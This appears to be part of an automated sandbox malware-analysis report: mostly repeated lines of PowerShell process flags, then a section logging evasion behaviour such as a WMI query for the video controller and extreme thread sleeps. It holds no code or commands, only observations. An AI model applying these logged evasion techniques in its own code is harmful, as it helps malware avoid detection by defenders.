Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5303
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4589
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7845
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1801
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4249
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 497
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7930
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1594
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5671
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6927
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2380
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2175
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7688 Thread sleep count: 5303 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7688 Thread sleep count: 4589 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7756 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444 Thread sleep count: 7845 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476 Thread sleep count: 1801 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8 Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524 Thread sleep count: 4249 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5664 Thread sleep count: 497 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800 Thread sleep count: 7930 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2844 Thread sleep count: 1594 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3616 Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1260 Thread sleep count: 5671 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080 Thread sleep count: 199 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2424 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4820 Thread sleep count: 6927 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4592 Thread sleep count: 2380 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3796 Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6532 Thread sleep count: 2175 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7556 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6392 Thread sleep count: 285 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7180 Thread sleep time: -1844674407370954s >= -30000s
